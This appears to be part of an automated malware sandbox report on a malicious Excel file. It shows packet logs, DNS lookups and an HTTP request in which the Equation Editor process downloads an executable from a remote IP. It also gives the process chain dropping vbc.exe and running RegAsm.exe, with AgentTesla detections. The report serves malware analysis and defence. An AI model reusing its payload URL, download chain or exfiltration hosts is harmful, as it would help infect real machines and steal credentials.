                                              Nov 20, 2020 13:47:41.529736042 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529737949 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529771090 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529772997 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529808998 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529812098 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529848099 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529850006 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529889107 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529897928 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529936075 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529939890 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.529974937 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.529978037 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530014038 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530015945 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530052900 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530055046 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530092955 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530092955 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530128002 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530131102 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530165911 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530169964 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530209064 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530216932 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530255079 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530258894 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530297041 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530297995 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530332088 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.530337095 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.530374050 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.532629013 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.642585039 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.642640114 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.642678976 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.642715931 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.642719030 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.642746925 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.642764091 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.642765999 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.642808914 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.642827034 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.642863989 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783087015 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783122063 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783126116 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783159971 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783164024 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783198118 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783200979 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783235073 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783240080 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783273935 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783277988 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783312082 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783324957 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783360958 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783369064 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783402920 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783406973 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783442020 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783446074 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783480883 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783484936 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783519030 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783523083 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783557892 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783560991 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783596039 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783598900 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783632994 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783646107 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783680916 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783689022 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783723116 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783725977 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783760071 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783765078 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783798933 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783803940 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783837080 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783843040 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783875942 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783880949 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783914089 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783919096 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.783953905 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.783966064 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784001112 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784020901 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784055948 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784060955 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784096003 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784099102 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784132957 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784137964 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784172058 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784174919 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784210920 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784214020 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784249067 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784251928 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784285069 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784297943 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784333944 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784341097 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784375906 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784379005 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784414053 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784418106 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784452915 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784456015 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784490108 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784492970 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784527063 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784533024 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784567118 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784570932 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784605026 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784616947 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784651995 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784658909 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784697056 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784701109 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784729958 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784735918 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784770966 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784774065 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784809113 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784811020 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784845114 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784851074 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784884930 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784888983 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784923077 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784935951 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.784970045 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.784980059 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.785015106 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.785017967 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.785052061 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.785056114 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.785090923 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.785094976 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.785128117 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.788667917 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791538954 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791583061 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791610003 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791616917 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791620016 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791654110 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791659117 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791695118 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791696072 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791743040 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791743040 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791779995 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791785955 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791822910 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791824102 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791858912 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791863918 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791898966 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791902065 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791937113 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791939020 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.791974068 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.791977882 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792011976 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792015076 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792061090 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792073011 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792109013 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792114019 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792149067 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792150974 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792186975 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792211056 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792247057 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792253971 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792289972 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792292118 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792327881 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792339087 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792373896 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792381048 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792418003 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792418957 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792454958 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792458057 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792495966 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792498112 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792531967 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792535067 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792571068 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792572975 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792609930 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792610884 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792645931 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792656898 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792695045 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792701006 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792736053 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792737961 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792773008 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792777061 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792820930 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792824030 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792859077 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792861938 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792896986 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792900085 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792936087 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792937994 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.792972088 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.792974949 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793009043 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793014050 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793047905 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793051958 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793086052 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793098927 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793133974 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793140888 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793174982 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793179035 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793212891 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793219090 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793251991 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793256998 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793291092 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793293953 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793325901 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793333054 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793366909 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793370962 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793407917 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:41.793438911 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:41.793473005 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:42.380805969 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:49:16.660486937 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:16.763071060 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.763283014 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:16.781337976 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:16.883955002 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.884042025 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.884105921 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.884166956 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.884221077 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.884247065 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:16.884291887 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:16.885310888 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:16.902721882 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:17.005975962 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:17.203488111 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:18.463567019 CET49168443192.168.2.2223.21.42.25
                                              Nov 20, 2020 13:49:18.571918011 CET4434916823.21.42.25192.168.2.22
                                              Nov 20, 2020 13:49:18.779272079 CET49168443192.168.2.2223.21.42.25

                                              UDP Packets


                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 13:49:16.522818089 CET | 192.168.2.22 | 8.8.8.8 | 0x2d02 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Nov 20, 2020 13:49:16.575975895 CET | 192.168.2.22 | 8.8.8.8 | 0xecd9 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Nov 20, 2020 13:49:20.742588043 CET | 192.168.2.22 | 8.8.8.8 | 0x6937 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001)

                                              DNS Answers


                                              HTTP Request Dependency Graph

                                              • 198.23.212.152

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.22 | 49167 | 198.23.212.152 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                              Timestamp | kBytes transferred | Direction | Data
                                              Nov 20, 2020 13:47:40.685847044 CET | 0 | OUT | GET /doc/tochi.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 198.23.212.152
                                              Connection: Keep-Alive
                                              Nov 20, 2020 13:47:40.805413961 CET | 1 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 20 Nov 2020 12:47:40 GMT
                                              Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                              Last-Modified: Fri, 20 Nov 2020 07:43:07 GMT
                                              ETag: "97200-5b484fece2d5f"
                                              Accept-Ranges: bytes
                                              Content-Length: 619008
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload


                                              HTTPS Packets

                                              Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                                              Nov 20, 2020 13:49:16.885310888 CET | 23.21.42.25 | 443 | 192.168.2.22 | 49168 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0 | 36f7277af969a6947a61ae0b815907a1

                                              Certificate chain for this session:

                                              Subject | Issuer | Not Before | Not After
                                              CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated | CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Jan 24 01:00:00 CET 2018 | Sun Jan 24 00:59:59 CET 2021
                                              CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Feb 12 01:00:00 CET 2014 | Mon Feb 12 00:59:59 CET 2029
                                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Jan 19 01:00:00 CET 2010 | Tue Jan 19 00:59:59 CET 2038

                                              System Behavior

                                              General

                                              Start time:13:46:44
                                              Start date:20/11/2020
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13f0c0000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:13:47:04
                                              Start date:20/11/2020
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:13:47:09
                                              Start date:20/11/2020
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x1010000
                                              File size:619008 bytes
                                              MD5 hash:C11D6124EE0522C7AB71D20CF3474DC0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:13:47:17
                                              Start date:20/11/2020
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Imagebase:0xc0000
                                              File size:64672 bytes
                                              MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, Author: Joe Security
